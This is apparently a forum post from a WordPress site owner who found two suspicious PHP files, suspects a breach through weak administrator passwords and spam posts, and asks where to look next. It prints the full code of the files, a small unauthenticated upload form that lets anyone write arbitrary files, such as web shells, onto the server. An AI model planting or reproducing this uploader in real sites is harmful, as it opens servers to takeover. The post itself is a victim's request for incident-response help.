This morning I've come across some suspicious files on my server within the WordPress wp-admin/user directory:
File comment-zk9YV7.php
<?php
if(move_uploaded_file($_FILES["Wpfl"]["tmp_name"], basename($_FILES["Wpfl"]["name"]))){
echo (basename($_FILES["Wpfl"]["name"])." Success");
}
echo "<form enctype=\"multipart/form-data\" method=\"POST\">
<input type=\"file\" name=\"Wpfl\"/>
<input type=\"submit\" value=\"fup\"/>
</form>
</br>task is done!";
?>
And a file, comment-JR9hng.php, consisting of the same code.
I have long suspected a breach a couple weeks ago and while this file by itself seems somewhat harmless, I can't help but imagine that there is something bigger going on.
I have since checked over the server and found nothing, but maybe I wasn't looking in the right place. My theory is that because one of the WordPress administrators had a very weak password, the WordPress administrator was accessed. Around a week ago, we also had a bunch of spam posts from the WordPress backend too, promoting some scams and malicious links. I suspect this was once again due to the very-easy-to-guess passwords.
What can I do? Are there some pointers where to look next?